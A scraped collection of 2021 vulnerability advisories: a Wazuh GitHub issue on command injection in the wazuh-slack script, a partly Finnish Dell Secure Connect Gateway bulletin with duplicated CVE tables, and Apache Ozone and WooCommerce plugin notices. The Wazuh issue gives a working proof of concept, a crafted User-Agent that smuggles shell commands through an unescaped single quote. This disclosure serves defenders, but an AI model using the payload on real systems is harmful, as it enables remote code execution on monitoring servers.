In the wazuh-slack active response script in Wazuh before 4.2.5, untrusted user agents are passed to a curl command line, potentially resulting in remote code execution.

Wazuh version

Component

Install type

Install method

Platform

Fix

4.2.0

Active-response script

Manager/Agent

Packages

CentOS 7

#10809

This issue was reported by @rk700.

We found a command injection bug in the active-response script wazuh-slack.

The alert json data is put in the shell command line as POST body for `curl`:

snprintf(system\_command, OS\_MAXSTR -1, "curl -H \\"Accept: application/json\\" -H \\"Content-Type: application/json\\" -d '%s' %s", output\_str, site\_url);

However, the raw log line which could be partially controlled by an attacker is also included in the JSON data. Single quote in JSON is not escaped and therefore could be used to truncate the command:

    -d '<json data that could be partially controlled>'
    

Steps to reproduce are as follows.

First, we add the `wazuh-slack` active-response in the config:

  <command\>
    <name\>wazuh-slack</name\>
    <executable\>wazuh-slack</executable\>
    
    <extra\_args\>http://192.168.1.95:8080/test</extra\_args\>
  </command\>

  <active-response\>
    <disabled\>no</disabled\>
    <command\>wazuh-slack</command\>
    <location\>server</location\>
    <level\>6</level\>
  </active-response\>

Then we setup a web server on the client machine, and send request with crafted User-Agent:

curl -I 192.168.1.96/1.html -A "() { :;};ls ' 192.168.1.95:8080;touch /tmp/injection;echo '"

The shellshock PoC will trigger an alert, and the crafted User-Agent value which is contained in web server access.log would also be included in the command line as follows:

curl -H "Accept: application/json" -H "Content-Type: application/json" -d '{"attachments":\[{"color
":"danger","pretext":"WAZUH Alert","title":"Shellshock attack detected","text":"192.168.1.96 - - \[04/Nov/2021:12:53:56 +0800\] \\"GET /1.html HTTP/1.1\\" 200 5
 \\"-\\" \\"() { :;};ls ' 192.168.1.95:8080;touch /tmp/injection;echo '\\"","fields":\[{"title":"Agent","value":"(001) - hids\_client"},{"title":"Location","value":"/var/
log/apache2/access.log"},{"title":"Rule ID","value":"31168 (level 15)"}\],"ts":"1636001638.913845"}\]}' http://192.168.1.95:8080/test

Here we use the single quote to jump out of `-d '<json data>'` and inject the command `touch /tmp/injection` with semicolons. We can verify that on the server where the `wazuh-slack` is running(the wazuh-manager machine in this case since we set the location as `server` in the active-response config):

    root@ubuntu:~# ls -l /tmp/injection
    -rw-r--r-- 1 root ossec 0 Nov  4 17:19 /tmp/injection
    

Special thanks to @rk700 for detecting and reporting this issue to the team.

CVE-2021-44079: Active response tools allow arbitrary code execution · Issue #10858 · wazuh/wazuh

Dell EMC SCG 5.00.00.10 and earlier, contain a sensitive information disclosure vulnerability. A local malicious user may exploit this vulnerability to read sensitive information and use it.

**Vaikutus**

Critical

**Tiedot**

**Proprietary Code CVE**

**Description**

**CVSSBase Score**

**CVSS Vector String**

CVE-2021-36340

Dell EMC SCG 5.00.00.10 and earlier, contains a sensitive information disclosure vulnerability. A local malicious user may exploit this vulnerability to read sensitive information.

7.8

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

 

**Third-Party Component**  
 

**CVEs**

**More information**

java

CVE-2021-2341  
CVE-2021-2369  
CVE-2021-2388  
CVE-2021-2432  
CVE-2021-3517  
CVE-2021-3522  
CVE-2021-35559  
CVE-2021-35603  
CVE-2021-35556  
CVE-2021-35603  
CVE-2021-35556  
CVE-2021-35567  
CVE-2021-35578  
CVE-2021-35588  
CVE-2021-35565  
CVE-2021-35564  
CVE-2021-35586  
CVE-2021-35550  
CVE-2021-35561  
CVE-2021-35560

See NVD (http://nvd.nist.gov/) for individual scores for each CVE

kernel-default-base  
 

CVE-2020-0429  
CVE-2020-36385  
CVE-2021-22543  
CVE-2021-22555  
CVE-2021-3609  
CVE-2021-3612  
CVE-2021-3659  
CVE-2021-37576

libxerces

CVE-2018-1311

file  
file-magic  
libmagic

CVE-2019-18218

libsolv  
 

CVE-2021-3200

apache2  
 

CVE-2021-30641  
CVE-2021-33193

libdbus

CVE-2020-12049  
CVE-2020-35512

openssl

CVE-2021-3711  
CVE-2021-3712

cpio

CVE-2021-38185  
 

libpq5

CVE-2021-3677

**Proprietary Code CVE**

**Description**

**CVSSBase Score**

**CVSS Vector String**

CVE-2021-36340

Dell EMC SCG 5.00.00.10 and earlier, contains a sensitive information disclosure vulnerability. A local malicious user may exploit this vulnerability to read sensitive information.

7.8

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

 

**Third-Party Component**  
 

**CVEs**

**More information**

java

CVE-2021-2341  
CVE-2021-2369  
CVE-2021-2388  
CVE-2021-2432  
CVE-2021-3517  
CVE-2021-3522  
CVE-2021-35559  
CVE-2021-35603  
CVE-2021-35556  
CVE-2021-35603  
CVE-2021-35556  
CVE-2021-35567  
CVE-2021-35578  
CVE-2021-35588  
CVE-2021-35565  
CVE-2021-35564  
CVE-2021-35586  
CVE-2021-35550  
CVE-2021-35561  
CVE-2021-35560

See NVD (http://nvd.nist.gov/) for individual scores for each CVE

kernel-default-base  
 

CVE-2020-0429  
CVE-2020-36385  
CVE-2021-22543  
CVE-2021-22555  
CVE-2021-3609  
CVE-2021-3612  
CVE-2021-3659  
CVE-2021-37576

libxerces

CVE-2018-1311

file  
file-magic  
libmagic

CVE-2019-18218

libsolv  
 

CVE-2021-3200

apache2  
 

CVE-2021-30641  
CVE-2021-33193

libdbus

CVE-2020-12049  
CVE-2020-35512

openssl

CVE-2021-3711  
CVE-2021-3712

cpio

CVE-2021-38185  
 

libpq5

CVE-2021-3677

Dell Technologies suosittelee, että kaikki asiakkaat ottavat huomioon sekä CVSS-peruspistemäärän että kaikki asiaankuuluvat väliaikaiset ja ympäristöön liittyvät pisteet, jotka voivat vaikuttaa tietyn tietoturvahaavoittuvuuden mahdolliseen vakavuuteen.

**Tuotteet, joihin asia vaikuttaa ja tilanteen korjaaminen**

**Product**

**Affected Versions**

**Updated Version**

**Link to Update**

Dell EMC Secure Connect Gateway - Virtual Edition

5.00.00.10  
3.52.10.08

5.00.05.10

The Secure Connect Gateway patch is published in Dell SUMA (SUSE Repo Manager) repository and the existing process triggers an Email notification to customer’s Secure Connect Gateway primary and secondary contacts. Email notification contains a link to Release notes (along with details of security updates) and a link to update the customer’s Gateway to the latest patch. Contact Dell EMC Secure Connect Gateway Virtual Edition Customer Support for any questions regarding upgrading your Dell EMC Secure Connect Gateway Virtual Edition system.  
 

**Product**

**Affected Versions**

**Updated Version**

**Link to Update**

Dell EMC Secure Connect Gateway - Virtual Edition

5.00.00.10  
3.52.10.08

5.00.05.10

The Secure Connect Gateway patch is published in Dell SUMA (SUSE Repo Manager) repository and the existing process triggers an Email notification to customer’s Secure Connect Gateway primary and secondary contacts. Email notification contains a link to Release notes (along with details of security updates) and a link to update the customer’s Gateway to the latest patch. Contact Dell EMC Secure Connect Gateway Virtual Edition Customer Support for any questions regarding upgrading your Dell EMC Secure Connect Gateway Virtual Edition system.  
 

**Kiitokset**

Dell would like to thank Thorsten Tüllmann for reporting CVE-2021-36340.  
 

**Versiohistoria**

**Revision**

**Date**

**Description**

1.0

2021-11-17

Initial Release

**Asiaan liittyvät tiedot**

Dell Security Advisories and Notices  
Dell Vulnerability Response Policy  
CVSS Scoring Guide

Tämän Dell Technologiesin tietoturvatiedotteen tiedot on luettava, ja niiden avulla voidaan välttää tilanteita, jotka voivat johtua tässä kuvatuista ongelmista. Dell Technologiesin tietoturvatiedotteet tuovat tärkeitä tietoturvatietoja haavoittuvuudelle alttiiden tuotteiden käyttäjien tietoon. Dell Technologies arvioi riskin perustuen asennettujen järjestelmien hajautetun joukon keskimääräisiin riskeihin, eikä se välttämättä vastaa paikallisen asennuksen ja yksittäisen ympäristön todellista riskiä. Suositus on, että kaikki käyttäjät ratkaisevat näiden tietojen sovellettavuuden yksittäisten ympäristöjen mukaan ja ryhtyvät tarvittaviin toimenpiteisiin. Tässä esitetyt tiedot annetaan "sellaisenaan" ilman minkäänlaista takuuta. Dell Technologies kiistää kaikki suorat tai epäsuorat takuut, mukaan lukien takuut soveltuvuudesta kaupankäynnin kohteeksi, sopivuudesta tiettyyn käyttötarkoitukseen, omistusoikeudesta ja loukkaamattomuudesta. Dell Technologies, sen tytäryhtiöt tai toimittajat eivät missään tilanteessa ole vastuussa mistään vahingoista, jotka johtuvat tässä asiakirjassa mainituista tiedoista tai toimenpiteistä, joihin käyttäjä päättää ryhtyä. Tämä koskee kaikkia suoria, epäsuoria, satunnaisia, välillisiä, liikevoiton menetykseen liittyviä tai erityisluontoisia vahinkoja, vaikka Dell Technologies tai sen tytäryhtiöt tai toimittajat olisivat saaneet tiedon tällaisten vahinkojen mahdollisuudesta. Jotkin osavaltiot eivät salli satunnaisten tai seuraamuksellisten vahinkojen vastuun poistamista tai rajoittamista, joten edellä mainittua rajoitusta sovelletaan vain lain sallimassa laajuudessa.

Secure Connect Gateway, Secure Connect Gateway, Secure Connect Gateway - Virtual Edition

CVE-2021-36340: DSA-2021-245: Dell EMC Secure Connect Gateway Security Update for Multiple Vulnerabilities

The Preview E-Mails for WooCommerce WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the search_order parameter found in the ~/views/form.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 1.6.8.

CVE-2021-42363: Vulnerability Advisories - Wordfence

In Apache Ozone before 1.2.0, Authenticated users with valid Ozone S3 credentials can create specific OM requests, impersonating any other user.

**Email display mode:**

Modern rendering  
Legacy rendering

CVE-2021-39236

In Apache Ozone before 1.2.0, Ozone Datanode doesn't check the access mode parameter of the block token. Authenticated users with valid READ block token can do any write operation on the same block.

CVE-2021-39235

In Apache Ozone versions prior to 1.2.0, certain admin related SCM commands can be executed by any authenticated users, not just by admins.

CVE-2021-39232

In Apache Ozone versions prior to 1.2.0, Various internal server-to-server RPC endpoints are available for connections, making it possible for an attacker to download raw data from Datanode and Ozone manager and modify Ratis replication configuration.

CVE-2021-39231

In Apache Ozone before 1.2.0, Recon HTTP endpoints provide access to OM, SCM and Datanode metadata. Due to a bug, any unauthenticated user can access the data from these endpoints.

CVE-2021-41532

Severity: moderate

Description:

Recon HTTP endpoints provide access to OM, SCM and Datanode metadata. Due to a bug, any unauthenticated
user can access the data from these endpoints.

This issue is being tracked as HDDS-5691

Mitigation:

Upgrade to Apache Ozone release version 1.2.0

Credit:

Apache Ozone would like to thank Ethan Rose for reporting this issue.


---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@ozone.apache.org
For additional commands, e-mail: dev-help@ozone.apache.org

CVE-2021-41532: Unauthenticated access to Ozone Recon HTTP endpoints

Description:

Authenticated users with valid Ozone S3 credentials can create specific OM requests, impersonating
any other user. 

This issue is being tracked as HDDS-4763

Mitigation:

Upgrade to Apache Ozone release version 1.2.0

Credit:

Apache Ozone would like to thank Marton Elek for reporting this issue.


---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@ozone.apache.org
For additional commands, e-mail: dev-help@ozone.apache.org

Tag

#apache